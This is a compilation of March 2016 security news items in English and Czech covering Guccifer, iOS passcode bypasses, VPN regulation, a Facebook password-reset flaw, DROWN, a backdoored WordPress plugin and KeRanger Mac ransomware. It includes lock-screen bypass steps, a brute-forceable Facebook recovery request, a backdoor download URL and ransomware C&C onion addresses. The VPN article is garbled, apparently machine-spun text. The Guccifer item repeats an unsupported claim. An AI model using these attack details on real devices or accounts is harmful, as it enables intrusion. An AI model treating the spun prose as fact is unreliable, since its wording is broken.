Guccifer rose into the popularity in 2013 after hacking into the email account of George W. Bush and leaking Bush's personal photographs and artwork, including two self-portraits: one in the shower and one in the bathtub.
The same hacker was responsible to crack into the AOL Account of Bush’s Sister, Dorothy Bush Koch and targeted a number of high-profile celebrities, including Nicole Kidman, Comedian Steve Martin, Actor Leonardo DiCaprio, Actress Mariel Hemingway, 'Sex and the City' author Candace Bushnell, Biographer Kitty Kelley, released some of Hillary Clinton's private emails and many more.
The 42-year-old hacker had also claimed that Bush was a member of Ku Klux Klan – a White Supremacist Racist group by the Anti-Defamation League and the Southern Poverty Law Center, allegedly having total 5,000 to 8,000 members.
This intensified leakage had caused many repercussions on many topics like the romantic relationships between Colin Powell and Corina Cretu (Romanian Politician), even though both denied the statement.
If you want to explore more about the Guccifer Leaks, you may visit the site named 'The Smoking Gun' to which he published the leaked contents (don't expect a Wikileaks model).
Guccifer was serving as a Taxi Driver when Romania's DIICOT anti-organized crime and terrorism unit arrested him. He kickstarted his career as a Hacker at the age of 35.
According to his wife, Guccifer did most of his hacking from the quiet Sâmbăteni, which is located in the Draculan Village Transylvania.
Guccifer was sentenced for intrusion charges to popular profiles by the Romanian court to four years in jail in 2014 "with the aim of getting ... confidential data" and is serving another three-year term for other offences.


How to bypass Apple Passcode in 9.1 and later
8.3.2016 Apple

A number of bypass vulnerabilities still affect iOS devices and could be exploited by an attacker to bypass the passcode authorization screen.
A number of bypass vulnerabilities still affect iOS devices and could be exploited by an attacker to bypass the passcode authorization screen on Apple mobile devices (iPhones and iPads) running iOS 9.0, 9.1, and the recent 9.2.1.

According to Benjamin Kunz Mejri, a researcher at Vulnerability Lab, this category of security holes can be exploited to access apps native to iOS, such as Clock, Event Calendar, and Siri’s User Interface.

In February, Benjamin Kunz Mejri discovered an authentication bypass-sized hole in both iPhones and iPads running iOS 8 and iOS 9 that can be exploited by attackers to thwart lock screen passcode.

“An application update loop that results in a pass code bypass vulnerability has been discovered in the official Apple iOS (iPhone5&6|iPad2) v8.x, v9.0, v9.1 & v9.2. The security vulnerability allows local attackers to bypass pass code lock protection of the apple iphone via an application update loop issue. The issue affects the device security when processing to request a local update by an installed mobile ios web-application.” states the technical description published by the vulnerability-lab.com.

The attacker can bring the iOS devices into an unlimited loop resulting in a temporarily deactivate of the pass code lock screen.

The real problem is that they are underestimated by manufacturers because the attack request the physical presence of the attackers which have to be in possession of the device, in the specific case the flaw is still present after it was reported three months ago (2016-01-03: Researcher Notification & Coordination (Benjamin Kunz Mejri – Evolution Security GmbH))

“The issue is not fixed after a three-month duration. We have the newest versions of iPad and iPhone and are still able to reproduce it after the updates with default configuration,” Mejri told Threatpost Monday.

This time Mejri described a number of attack vectors relying on an internal browser link request to skip the passcode screen.

In a first scenario, an attacker could request Siri to open an app that doesn’t exist, at this point Siri will open a restricted browser window to the App Store, but from there the attacker could switch back to the home screen, either via the home button, or via Siri.

apple passcode bypass

In the second scenario the attacker is using the control panel to gain access to the non restricted clock app. The attacker opens the app via siri or via panel and opens then the timer to the end timer or Radar module. The app allows users to buy more sounds for alerts and implemented a link, but if the attacker pushes the link a restricted app store browser window opens. At that point we are in the same situation of the first attack vector.

In the third scenario, the attacker opens via panel or by a Siri request the clock app. The internal world clock module includes in the bottom right is a link to the weather channel that redirects users to the store as far as its deactivated. By pushing the link also in this case a restricted appstore browser window opens.

“At that point it is possible to unauthorized switch back to the internal home screen by interaction with the home button or with siri again. The link to bypass the controls becomes visible in the World Clock (Weather Channel) and is an image as link. Thus special case is limited to the iPad because only in that models use to display the web world map. In the iPhone version the bug does not exist because the map is not displayed because of using a limited template. The vulnerability is exploitable in the Apple iPad2 with iOS v9.0, v9.1 & v9.2.1.” wrote Mejri.

In the fourth scenario the attacker opens via Siri the ‘App & Event Calender’ panel, then he opens under the Tomorrow task the ‘Information of Weather’ (Informationen zum Wetter – Weather Channel LLC) link on the left bottom. The weather app is deactivated on the Apple iOS device, a new browser window opens to the AppStore, at that point we are in the same scenario seen in the other point.

It’s unclear when Apple will fix the issues. it is possible that the flaws will be solved with the iOS 9.3.


International politics of the VPN regulation
8.3.2016 Safety

How VPN (virtual private networks) are being utilized for stimulation, legislative issues, and correspondence in various nations.
As information security guru Bruce Schneier and his Berkman Center for Internet and Society associates brought up in a report a week ago, there are currently around 865 encryption-related items accessible all around the globe. From voice encryption tools to free and premium VPNs, this business sector extends a long ways past the fringes of the United States. Today, the encryption economy incorporates no less than 55 distinctive nations crosswise over Europe, Latin America, the Asia-Pacific, and the Caribbean.

The sprawling environment of programming improvement makes a conspicuous issue for governments and security organizations trying to screen or contain the privacy software. Free programs and other dispersed undertakings commonly exist “on numerous servers, in different nations, all the while,” and organizations offering anonymous tools can relocate the borders over outskirts without breaking a sweat.

To those focusing already, none of this is news. Numerous onlookers likewise concur that authoritative regulation of encryption would be a dangerous endeavor. In any case, when in doubt, maybe we shouldn’t rush to accept that the Internet will dependably and definitely discover a route around the stumbling country state.

In the setting of the present talk, it merits remembering that administrations have numerous different choices available to them with regards to controlling the utilization of protection tools. While these choices are once in a while completely powerful as a regulation measure, they can have some impact with regards to dissuading new clients from taking up specific advancements.

We should take the instance of VPNs as a sample. Once a business organizing apparatus, the VPN has lately transformed into a membership based individual administration for online privacy, security and remote server access – getting to be a standout amongst the most easy to use appearances of protection tools. Governments around the globe are currently scrambling to stay aware of the quick take-up of VPNs and their assorted applications for customers, nationals, and crooks alike.

As a major aspect of a project having international research, a group of the digital media analysts have been following and looking at universal patterns in VPN use, society, and regulation. Throughout the most recent year, researchers have been concentrating how VPNs (and other security weapons) are being utilized for stimulation, legislative issues, and correspondence in various nations. The outcomes have been enlightening.

One of the rising subjects is that distinctive governments take diverse ways to deal with managing VPNs. In nations with solid Internet oversight, a typical technique is a blend of authoritative bans and system level squares. In China, home of the world’s most advanced Internet oversight framework, various VPN sites have been blocked from the net under the appearance of a crackdown on unlicensed telecoms administrations. VPN movement has been upset through profound bundle review and port blocking, as well. Comparable boycott and block-systems are set up in a few Gulf States, including Bahrain, Oman and Saudi Arabia, and in Pakistan. Reports recommend that Russia has been considering such a move.

On the other hand, elsewhere technical-blocks are being joined with more vindictive measures. The Freedom House reports that Syrian powers “have created fake Skype encryption devices and a fake VPN application, both containing hurtful Trojans.”

Furthermore, another turn on the story was as of late found in Iran, where the state has had a go at entering the VPN industry itself. As indicated by Small Media advocacy group, Iranian powers tested in 2013 with setting up their own “authority” VPNs. These VPNs were hyped to have connection with government yet worked superbly well to check Facebook or YouTube, inasmuch as clients were not put off by government reconnaissance.

vpn works

At that point obviously we have the entire issue of private regulation as stage level VPN blocking. Video administrations, for example, Netflix, Hulu, and BBC iPlayer—with variable levels of adequacy and eagerness—have all been utilizing outsider business programming for blocking access from IP addresses associated with being utilized by the VPNs.

What does this mean for the eventual fate of privacy software like VPNs?

The signs are blended. Tech liberationists are most likely right to demand that the circulated way of cryptography and encryption imply that tech groups will more often than not discover a path around top-down regulation. What’s more, administration suppliers have numerous alternatives in the progressing session of whack-a-mole, for example, exchanging locales, changing server runs, and imagining new workarounds.

In the meantime, we ought to be mindful so as not to accept that VPNs, voice scramblers, email encryption, or whatever other innovation items are totally past the limits of regulation at the purpose of utilization and in addition generation. Security organizations are a long way from weak in this diversion, particularly when the fundamental point is to dishearten uptake no matter how you look at it as opposed to stamp out use among techies.

At the end of the day, the country state still has a couple traps up its sleeve. The stakes of this verbal confrontation will just increment in the coming years as anonymization and security innovations enter further into the standard of tech society.


Nový firewall Cisco namísto omezování uživatelů sám vyhledává hrozby

8.3.2016 Zabezpečení
Cisco přepracovalo své firewally Firepower NGFW tak, aby podle svých slov namísto zaměření na regulaci aplikací naopak omezovaly rizika. Přístup lze prý přirovnat k ochraně rodinného domu – zatímco dříve se chránilo zabezpečením oken a dveří, nově se odhalují potenciální zloději.

Firepower Next-Generation Firewall řady 4100 podle výrobce představuje jejich vůbec první plně integrovaný firewall zaměřený na hrozby. Spolu s ním začala firma nabízet i asistenční službu Security Segmentation Service, která má firmám pomoci zavádět mj. bezpečnostní opatření pro zlepšení souladu s předpisy.

Firepower NGFW například propojuje kontextuální informace o tom, jak uživatelé přistupují k aplikacím, s aktuálními informacemi o hrozbách a s vynucováním pravidel. To urychluje odhalování a potlačování hrozeb.

Produkt je prý také jedním z prvních zařízení se 40Gb ethernetovým připojením v kompaktním provedení pro jednu pozici v racku. Firewall dokáže také na základě přehledu o zranitelnostech, informačních aktivech a hrozbách automatizovat a vylaďovat nastavení bezpečnostních opatření pro rychlé posílení obrany.

Novinka spojuje technologii firewallů a služby pro odhalování hrozeb do jediného řešení. Je založená i na řešeních třetích stran, kdy se umožňuje sdílení bezpečnostních a kontextových informací mezi různými systémy – třeba Radware for Distributed Denial of Service (DDoS).

Podniky tak podle výrobce mohou efektivně propojovat dříve nesourodé informace a díky nim rychleji odhalovat a reagovat na pokročilé útoky bez ohledu na to, kde k nim dojde.


Your iPhone will Alert You if You are Being Monitored At Work
8.3.2016 Apple
Are You an Employee?
It's quite possible that someone has been reading your messages, emails, listening to your phone calls, and monitoring your activities at work.
No, it's not a spy agency or any hacker…
...Oops! It's your Boss.
Recently, European Court had ruled that the Employers can legally monitor as well as read workers' private messages sent via chat software like WhatsApp or Facebook Messenger and webmail accounts like Gmail or Yahoo during working hours.
So, if you own a company or are an Employer, then you no need to worry about tracking your employees because you have right to take care of things that could highly affect your company and its reputation, and that is Your Employees!
Since there are several reasons such as Financial Need, Revenge, Divided Loyalty or Ego, why a loyal employee might turn into an INSIDER THREAT.
Insider Threat is a nightmare for Millions of Employers. Your employees could collect and leak all your professional, confidential data, upcoming project details to your Rivals and much more that could result in significant loss to the company.
According to the latest threat report conducted by the Vormetric, it is analyzed that 40% of organizations experienced a data breach last year, out of which 89% felt that their organizations were vulnerable to insider attacks.
In March 2010, an IT Developer in the British Airways had been accused of leaking the Airport Security procedures for terrorist-related activities. From this example, you could figure out that the Insider Threat may take up its devilish dimension to lead to a dangerous situation.
How Can Companies Monitor their Employees iPhone?
Some strategies could be benefited for the employers by tailing up employee’s daily activities during the work hours.
Major tech companies like Symantec and IBM have a history of maintaining a threat report to their employees by a dedicated device (BYOD) that regularly updates the Employee’s Professional Network usage, such as downloads or other social networking sessions, in a statistical method.
Apple also provides a similar feature to companies for monitoring their employee's activities via work-issued iPhones that are set up with an organization's Mobile Device Management (MDM) server.
This allows employers to remotely upgrade, control, track and supervise various aspects of the iPhone’s software.
iOS 9.3 Offers Companies to Monitor Employees Like Never Before
With the release of its upcoming iOS 9.3 version, Apple will provide a bunch of new features to employers, allowing companies to monitor their employees activities more deeply.
The new mobile operating system would let the company’s IT administrators enforce home screen layouts on your work-issued iPhones as well as lock apps to your home screen so that you can not be moved to a different folder or a page.
The upcoming iOS 9.3 will also allow companies to hide or blacklist specific applications that it does not want their employees to download.
So in short, your favorite games like Candy Crush or Angry Birds that your organization does not wish you to play during work hours could be blocked.
If this is not enough, your company will now also be able to enforce notification settings so that you will not be able to ignore your employers notifications.
So next time if your company calls you to report in a short notice period, you just can not say you have not read the message, neither you can give excuses that you missed it somehow.
These are some pretty significant changes the upcoming iOS 9.3 will bring in employers perspective.
Interestingly, the upcoming iOS 9.3 operating system empowers the employees as well. Let’s talk about what features the OS will offer employees.
iPhone will Notify if Your Company is Tracking You
The iOS 9.3 version will tell employees whether their employers are monitoring their company-issued iPhones.
This warning will now be displayed in two places on the work-issued iPhones:
Your iPhone’s lock-screen will display "This iPhone is managed by your organization" near the bottom of the screen, hindering you to use your phone for personal choice apart from professional usage.
Additionally, If you’ll check the "About" menu in the Setting, it will reveal what all data had been supervised by your Employer.
Such notification was not available in the previous version of iOS. This is the first time Apple is allowing its users to check whether their organization is keeping tabs on them.
Surely employees will love this new feature in upcoming iOS 9.3, but the companies may hate this features as their stand will be exposed for tracking their employees.
These new features would mark its presence in the upcoming iOS 9.3 release on March 21, 2016.


Expert discovered how to hack any Facebook account
8.3.2016 Social Site  Hacking

A security researcher has discovered a Facebook password reset vulnerability that allowed him to brute force into any FB account.
The security researcher Anand Prakash has discovered a password reset vulnerability affecting Facebook. The critical vulnerability could be exploited by attackers to hack into any FB account launching a brute force attack.

“This post is about a simple vulnerability found on Facebook which could have been used to hack into other user’s Facebook account easily without any user interaction. This gave me full access of another users account by setting a new password. I was able to view messages, his credit/debit cards stored under payment section, personal photos etc. Facebook acknowledged the issue promptly, fixed it and rewarded $15,000 USD considering the severity and impact of the vulnerability.” wrote the researcher in a blog post.

The critical flaw resides in the way Facebook’s beta pages handle “Forgot Password” requests. When a user forgets the password, Facebook allows him to get back into your FB account through the ‘Forgot Password’ procedure. Facebook sends a 6 digit code on a user’s phone number or email address. After you enter this code in the window, you are able to access your FB account and reset your password.

The user then submits the code to access his FB account and reset the password.

Prakash tried to find security holes in the Facebook’s Forgot Password procedure. He tried to brute force the 6 digit code in the ‘Forgot Password’ window, he discovered that it is possible to make just 12 attempts before being locked out.

Facebook Hack FB account

Prakash tried to perform the same operation on the Facebook beta pages, beta.facebook.com and mbasic.beta.facebook.com. He then discovered that there is no limit on the number of attempts for these two Facebook beta pages. The absence of a limitation, allowed the researcher to launch a brute force attack into any Facebook account.

The vulnerable request illustrated by the researcher is:

POST /recover/as/code/ HTTP/1.1 Host: beta.facebook.com
lsd=AVoywo13&n=XXXXX
Brute forcing the “n” successfully allowed Prakash to set a new password for any Facebook user.
Prakash reported the vulnerability to Facebook on February 22, 2016, the security team acknowledged the flaw and deployed a fix on February 23.

Facebook awarded Prakash a bug bounty of $15,000, below the Video PoC published by the expert:


Nebezpečná chyba DROWN je na 11 miliónech webů. V Česku jsou jich tisíce

7.3.2016 Zranitelnosti
Chyba DROWN, kterou mohou počítačoví piráti zneužít k odposlouchávání šifrované komunikace, se týká 11 miliónů webových stránek po celém světě. Upozornil na to server News Factor. V České republice jsou serverů, jež mohou být takto zneužity, tisíce.
O nebezpečné chybě DROWN informovaly Novinky.cz již minulý týden. [celá zpráva]

Už tehdy se hovořilo o tom, že zranitelnost se týká třetiny internetu. Přesné vyčíslení potencionálně nebezpečných serverů však ještě nebylo k dispozici.

S ohledem na 11 miliónů serverů po celém světě, které obsahují chybu DROWN, se zranitelnost logicky dotýká také podstatné části webů v České republice.

„Podle informací, které jsme doposud obdrželi, se problém týká téměř 13 000 IP adres. Všechny provozovatele těchto adres jsme již o tomto problému informovali,“ uvedla pro Novinky.cz analytička Zuzana Duračinská z Národního bezpečnostního týmu CSIRT, který je provozován sdružením CZ.NIC.

Jakých konkrétních webů se chyba týká, však neuvedla. To je vcelku logické, protože jinak by počítačoví piráti získali přehled o tom, na jaké servery se mohou zaměřit.

Uživatelé se bránit nemohou
Duračinská zároveň připomněla, že samotní uživatelé se proti útoku nemohou bránit. „Na straně uživatelů bohužel není možné se jakkoliv bránit. Potřebná opatření musí udělat dotčení provozovatelé služeb,“ doplnila.

Jediné, co mohou uživatelé dělat, je servery obsahující chybu nepoužívat. Ověřit, zda server obsahuje chybu DROWN je možné například zde. Stačí do kolonky vepsat požadovanou adresu a kliknout na tlačítko „Check for DROWN vulnerability”. Systém během chvilky vyhodnotí, zda daný web trhlinu obsahuje, či nikoliv.

Zranitelné mohou být webové stránky, mailové servery a jiné služby.
bezpečnostní analytik týmu CSIRT Pavel Bašta
Chyba se totiž týká šifrované komunikace, konkrétně staršího protokolu SSLv2. Právě kvůli tomu mohou zranitelnost opravit pouze provozovatelé serverů, nikoliv samotní uživatelé. Při návštěvě zranitelných stránek tak uživatelé nemusejí ani vědět, že něco není v pořádku.

Pokud se přihlašují na server, který obsahuje chybu, může být komunikace odposlouchávána. Když tedy zadají na počítači například přihlašovací údaje k internetovému bankovnictví, kyberzločinci se k nim mohou dostat díky chybě DROWN v podstatě ještě dřív, než dorazí na samotný server.

„Zranitelné mohou být webové stránky, mailové servery a jiné služby, které protokol TLS využívají,“ uvedl již dříve bezpečností analytik týmu CSIRT Pavel Bašta.


Plugin pro WordPress se může změnit v hrozbu, stačí změna majitele

7.3.2016 Zdroj: Lupa Hrozby

Roky spolehlivé pluginy pro WordPress se mohou proměnit v zásadní problém. Stačí, když se v nich objeví backdoor, který umožní převzít váš web.
Custom Content Type Manager (CCTM) je poměrně populární plugin pro WordPress, který slouží pro vytváření vlastních typů příspěvků. Najdete jej nainstalovaný na více než desítce tisíc webů. Sucuri ale varuje, že se v CCTM objevil backdoor.

Přišli na něj tak, že řešili napadený web a objevili podezřelý soubor auto-update.php právě ve složce s CCTM. Ten stahuje obsah z hxxp://wordpresscore .com/plugins/cctm/update/ a uloží ho do složky s CCTM jako PHP, tedy spustitelný soubor.

Při bližším zkoumání se potvrdilo, že zadní vrátka jsou přímo součástí CCTM, že nejde o výsledek napadení odjinud. A zjistili také to, že se zadní vrátka v CCTM objevila teprve 16. února 2016 v souvislosti s novým vlastníkem pluginu.

Právě změna vlastníků, ať už tím, že někdo původní plugin koupí, či se k vlastnictví dostane jiným způsobem, bývá nejčastějším momentem, kdy se z neškodných a spolehlivých věcí stávají škodlivé. Samotné CCTM přitom před touto změnou nebylo aktualizované dobrých deset měsíců – to je také jeden z příznaků, že je třeba si dát pozor: dlouho neaktualizované věci, které náhle dostanou aktualizaci. Sucuri upozorňují, že stejný nový vlastník se objevil u Postie pluginu.

Výše zmíněné auto-update.php ale není jedinou nebezpečnou změnou. V index.php se objevil přídavek, který se postará o odeslání informace na výše uvedené wordpresscore .com pokaždé, když se někdo přihlásí do svého webu. Velmi pravděpodobně slouží k tomu, aby se útočník dozvěděl, kde všude je plugin instalovaný.

Ve When a WordPress Plugin Goes Bad je také velmi detailní popis toho, jakým způsobem bylo právě CCTM použito pro hack. Ten spočíval ve využití auto-update.php pro stažení skriptu, který se postaral o změnu (vytvoření) wp-options.php. Následovaly zásahy do dalších souborů s vytvořením nového účtu správce. Změna dalších souborů navíc přinesla to, že útočník získal kompletní přihlašovací údaje.

Což ale není všechno. Další poměrně zvláštní změnou bylo přidání aktivace jquery.js z domény donutjs.com. Ta vypadá, jako kdyby skutečně byla zdrojem pro klasické jQuery, ale má řadu velmi podezřelých příznaků. Při bližším zkoumání zjistíte, že ve skutečnosti o jQuery vůbec nejde, uvnitř najdete pouze další skript, který nahlašuje instalaci/použití CCTM.

Máte ve Wordpressu CCTM nebo Postie?

Pokud ano, pak máte značný problém a měli byste se zbavit nejenom CCTM, ale také znovu nahrát čisté soubory wp-login.php, user-edit.php a user-new.php. Poté změnit hesla všem uživatelům, zrušit uživatele support a odstranit soubor wp-options.php, který se vám objevil v kořenové složce.

Pokud se bez CCTM neobejdete, tak je potřeba jít na poslední verzi, která není postižena – tou je 0.9.8.6. A k tomu nezapomenout na to, že automatické aktualizace (pokud jste je povolili) vám ji opět přepíší na napadenou variantu.


Ransomware je už i na Macu, stačilo stáhnout Transmission

7.3.2016 Zdroj: Lupa Viry

První plně funkční ransomware pro Mac zní jako dost velká věc na to, aby internet propadal panice. A ono se to tak trochu děje.
Palo Alto Networks nabízejí kompletní analýzu ransomware pro OS X skrývajícího se v podobě infikovaného instalátoru pro Transmission bittorent klienta. „KeRanger“, jak Palo Alto Networks tento nový virus pojmenovali, je dost dobře možná druhý ransomware pro OS X v historii (prvním je teoreticky FileCoder objevený Kaspersky Lab v roce 2014).

K infikování instalátorů pro Transmission došlo 4. března a napadena byla verze 2.90. Není známo, jakým způsobem k tomu došlo. Možná je kompromitovaný web, ale žádné bližší informace k dispozici nejsou.

Napadené instalátory jsou plně podepsané vývojářským certifikátem (jiným než běžným) a instalující uživatel nemá ponětí o tom, že vedle Transmission se mu do systému dostal další program.

Ten počká tři dny a poté se spojí s ovládacím serverem s pomocí sítě Tor a zahájí šifrování některých dokumentů a datových souborů v systému. Po dokončení klasicky zobrazí žádost o výkupné (jeden bitcoin). Pokud se budete chtít spoléhat na Time Machine pro obnovení, tak špatná zpráva je, že KeRanger se pokouší zašifrovat i obsah tam uložený.

Na Transmission webu už napadené instalátory nejsou, použitý certifikát byl Applem zneplatněn a antivirová data v XProtect už k KeRangeru obsahují potřebné informace.

Ve výše odkázané kompletní analýze viru je na konci i postup, jak ověřit, zda nejste tímto virem také napadeni. Lze to poznat jak podle přítomnosti některých souborů a disku, tak podle procesů v systému běžících.

Aktualizace XProtect antiviru znamená, že napadané verze Transmission nepůjde spustit. Případně je dobré vědět, že Transmission 2.92 by měla případně také pomoci v odstranění.


Nejlepší Antivir: podle testů AV Comparatives jsou výsledky těsné

7.3.2016 Zdroj: Živě Zabezpečení
Nezávislá testovací organizace AV Comparatives každoročně publikuje zprávu se souhrnnými výsledky z celoročního průběžného testování antivirových programů. Metodika testovaní se skládá z několika kategorií, které jsou hodnoceny zvlášť, přičemž o celkovém výsledku rozhodne souhrn těch dílčích. Hodnotí se úspěšnost v odstraňování malwaru, hledání infikovaných souborů, výkonnost, ochrana v reálném nasazení a proactive test.

Z celkového počtu dvaceti jedna testovaných antivirů všechny obdržely doporučující hodnocení, přesto ale některé vynikají více. Nejlepší hodnocení (Product of the year) obdržel software od Kaspersky Lab (konkrétně Kaspersky Internet Security).

Screen Shot 2016-03-06 at 00.09.36.png

Seznam všech testovaných antivirů a jejich výsledky v jednotlivých kategoriích

K prostudování výsledků nás motivoval rozsáhlý „falešní poplach“, který způsobil software od ESETu minulý týden. Na falešná hlášení se totiž antivirové programy rovněž testují a poslední test specializující se na tuto problematiku provedli v AV Comparatives v září loňského roku. Jak si vedl ESET? Zvítězil ještě spolu s dalšími dvěma programy, protože v rámci testu nenahlásil žádnou chybnou detekci. Případ z minulého týdne byl zjevně ojedinělý.

Screen Shot 2016-03-06 at 00.01.42.png

Testované antiviry v roce 2015

V celkovém hodnocení za rok 2015 získal Kaspersky ve většině kategorií nejlepší hodnocení a obhájil tak své prvenství z předchozího roku. V těsném závěsu se ale nachází hned šestice antivirů, které si také vedly velmi dobře. Tyto antiviry získávají ocenění „Top rated products“. S tímto označením z testu vyšel Avast, AVIRA, Bitdefender, Emsisoft, eScan a ESET.

Screen Shot 2016-03-06 at 00.30.21.png

Výsledky v kategorii „Real-world protection“, zde se hodnotí úspěšnost detektece škodlivého softwaru v reálném nasazení, zohledňuje se také míra falešných poplachů


Na Macy zamířil první funkční ransomware, šířil se skrz bittorrentový klient
7.3.2016 Zdroj: Živě
Viry

Ransomware je speciální typ malwaru, který má po infikaci za úkol zašifrování uživatelských dat. K jejich odemknutí je potom útočníky vyžadován poplatek, většinou v podobě bitcoinů. A zatímco v minulosti byl tento druh útoku doménou systému Windows, o víkendu se pravděpodobně poprvé rozšířil i do OS X. Zdrojem nákazy byl open-source nástroj Transmission, který slouží jako klient pro bittorrentovou síť. Šířil se přitom přes oficiální instalační balík.

Mac-Large.png

Transmission pro OS X, který o víkendu šířil ransomware

I když není jasné, jak se škodlivý kus kódu nazvaný OSX.KeRanger.A dostal do instalátoru, dokázal díky podepsanému vývojářskému certifikátu obejít i ochranu Gatekeeper v OS X. Nic mu potom nezabránilo vytvořit potřebné soubory, zašifrovat uživatelská data a začít komunikovat se servery útočníků prostřednictvím sítě Tor. Tam také byli uživatelé nasměrování pro zaplacení poplatku jednoho bitcoinu, tedy asi čtyř set dolarů, což mělo vést k odemknutí souborů.

Apple zareagoval jak zneplatněním vývojářského certifikátu, takže jsou uživatelé při instalaci důrazně varování před možným rizikem, tak aktualizací antivirového systému XProtect. Na webu Transmission potom visí upozornění na nutný update na verzi 2.92, která přinesla opravu a případné odstranění malwaru z OS.


First Mac OS X Ransomware Targets Apple Users
7.3.2016 Apple
Mac users, even you are not left untouched!
The World's first fully functional Ransomware targeting OS X operating system has been landed on Macs.
Ransomware – one of the fastest-growing cyber threats – encrypts the important documents and files on infected machines and then asks victims to pay ransoms in digital currencies so they can regain access to their data.
Though Ransomware has been targeting smartphones and Windows computers for a while, Mac OS X users haven't really had to worry about this threat… until now!
As security researchers from Palo Alto Networks claims to have discovered the very first known instance of OS X Ransomware in the wild, called "KeRanger" attacking Apple's Macintosh computers, firm's Threat Intelligence Director Ryan Olson told Reuters.
The KeRanger ransomware, which appeared on Friday, comes bundled into the popular Mac app Transmission, a free and open-source BitTorrent client for Mac with Millions of active users.
Must Read: How Just Opening an MS Word Doc Can Hijack Every File On Your System.
Here's How KeRanger Works
First Mac OS X Ransomware Targets Apple Users
Once a victim installs the infected versions of the app, KeRanger malware embeds itself in the victim's machine and encrypts the hard drive – containing important documents, images and videos files, as well as email archives and databases – after three days.
The KeRanger malware then asks the victim to pay 1 Bitcoin (~ $410) as the ransom amount to allow him/her to decrypt the hard disk and regain access to their important files.
The malware imposes a 72-hour lockout window unless the payment is made.
Though it is still unclear how the hackers managed to compromise the app and upload the infected files, it is believed that the hackers managed to hack the Transmission website as the site was served via HTTP rather than HTTPS.
Also Read: CTB-Locker Ransomware Spreading Rapidly, Infects Thousands of Web Servers.
How to Protect yourself against KeRanger
The security researchers suggested users to check for the existence of the following files in their machines:
/Applications/Transmission.app/Contents/Resources/General.rtf
/Volumes/Transmission/Transmission.app/Contents/Resources/ General.rtf
If any of the above-mentioned file exists, your Transmission app is likely infected with the new ransomware.
The malicious code also has a process name of "kernel_service", "kernel_pid", ".kernel_time" or ".kernel_complete," which can be killed, and stores its executable in the ~/Library directory. Delete these files if exist.
Upgrade to Version 2.91 of Transmission
Soon after, the Transmission developers released an updated version 2.92 of Transmission to ensure the ‘KeRanger’ malware files is actively removed.
So, if you had downloaded a vulnerable copy of Transmission from the web before the weekend, you must uninstall it now and upgrade to a clean 2.92 version of the software.
"Everyone running 2.90 on OS X should immediately upgrade to 2.91 or delete their copy of 2.90, as they may have downloaded a malware-infected file," Transmission posted this message in Red on its website.
Specifically, downloads of Transmission version 2.90 were infected with the nasty ransomware code that will encrypt your files after 3 days and demand a payment of $410 in Bitcoin to regain control.
However, it is worth noting that KeRanger has currently been detected only in the Transmission app for Mac. But, if the malware is widespread, it could affect other common Mac apps as well.


KeRanger, the new MAC OS X ransomware that hit Apple users on the weekend
7.3.2016 Apple  Virus

Over the weekend Apple customers who were looking for the latest version of Transmission were infected by KeRanger MAC OS X ransomware.
Bad news for Apple customers, their systems were targeted for the first time over the weekend by a ransomware campaign. The experts at Palo Alto Networks Unit 42 who discovered the malicious campaign reported that Apple customers who were looking for the latest version of Transmission, a popular BitTorrent client, were infected with a new family of Ransomware that was specifically designed to target OS X installations.

“On March 4, we detected that the Transmission BitTorrent ailient installer for OS X was infected with ransomware, just a few hours after installers were initially posted. We have named this Ransomware “KeRanger.” states the report published by Palo Alto Networks.

The researchers named this new Ransomware family KeRanger, they also released a technical analysis of the malware.

Ransomware attacks on MAC OS X systems is a novelty, in the past the unique malware with similar characteristics was FileCoder, a malicious code detected by Kaspersky Lab in 2014.

“The only previous ransomware for OS X we are aware of is FileCoder, discovered by Kaspersky Lab in 2014. As FileCoder was incomplete at the time of its discovery, we believe KeRanger is the first fully functional ransomware seen on the OS X platform.” continues the post.

KeRanger MAC OS X ransomware

According to the report, users who have directly downloaded Transmission installer from the official website in a specific time interval may be been infected by KeRanger MAC OS X ransomware.

“Users who have directly downloaded Transmission installer from official website after 11:00am PST, March 4, 2016 and before 7:00pm PST, March 5, 2016, may be been infected by KeRanger.”

The Transmission project promptly removed the malicious installers on Saturday (March 5) and it is urging its users to update to the latest version (2.92).

The experts discovered that the malware was embedded within the Transmission DMG file itself, but this was not enough to install the malware. The author of KeRanger also signed the installer with a valid code-signing certificate, issued to Polisan Boya Sanayi ve Ticaret A.Ş., a holding company in Istanbul, to bypass security measured implemented by the Apple’s Gatekeeper.

The experts noticed that authors have used hidden services to masquerade the command and control infrastructure, once infected a machine the KeRanger MAC OS ransomware will wait three days before contacting a Command & Control server. Below the list of services in the Tor network used in the by the ransomware.

lclebb6kvohlkcml.onion[.]link
lclebb6kvohlkcml.onion[.]nu
bmacyzmea723xyaz.onion[.]link
bmacyzmea723xyaz.onion[.]nu
nejdtkok7oz5kjoc.onion[.]link
nejdtkok7oz5kjoc.onion[.]nu
Once the ransomware has contacted the server it starts encrypting documents having more than 300 different extensions:

Documents: .doc, .docx, .docm, .dot, .dotm, .ppt, .pptx, .pptm, .pot, .potx, .potm, .pps, .ppsm, .ppsx, .xls, .xlsx, .xlsm, .xlt, .xltm, .xltx, .txt, .csv, .rtf, .tex
Images: .jpg, .jpeg,
Audio and video: .mp3, .mp4, .avi, .mpg, .wav, .flac
Archives: .zip, .rar., .tar, .gzip
Source code: .cpp, .asp, .csh, .class, .java, .lua
Database: .db, .sql
Email: .eml
Certificate: .pem
It is interesting to note that the ransomware is not able to start the encrypting process without making the initial contact to C&C servers.

When the files are encrypted, the KeRanger MAC OS ransomware demands $400.00 USD to the victims

The researchers suspect that the KeRanger MAC OS ransomware is still under development, in fact, they noticed the malware doesn’t encrypt Time Machine backup files, but the analysis of the code revealed that the is code to perform this action is already present in the malware, but it is still not active.

“Additionally, KeRanger appears to still be under active development and it seems the malware is also attempting to encrypt Time Machine backup files to prevent victims from recovering their back-up data.”

To mitigate the infections, the digital certificate used to sign the code has been already revoked. Apple added the installers to the Gatekeeper blacklist and also updated XProtect signatures to include the new KeRanger Ransomware family.


Studie: devět z deseti SSL VPN je beznadějně nebezpečných

7.3.2016 Hrozby

Používat VPN je v dnešních dnech jedna z důležitých součástí bezpečnější komunikace po internetu. Ale co když samy VPN služby nejsou bezpečné?
Devět z deseti SSL VPN je nebezpečných pro uživatele, používá zastaralé či nedostatečné formy šifrování a představuje hrozbu pro data, která skrz ně posíláte. To je výsledek testu 10 436 veřejně dostupných SSL VPN serverů (z celkového počtu asi 4 milionů náhodně vybraných adres) od těch největších výrobců jako je Cisco, Fortinet či Dell.

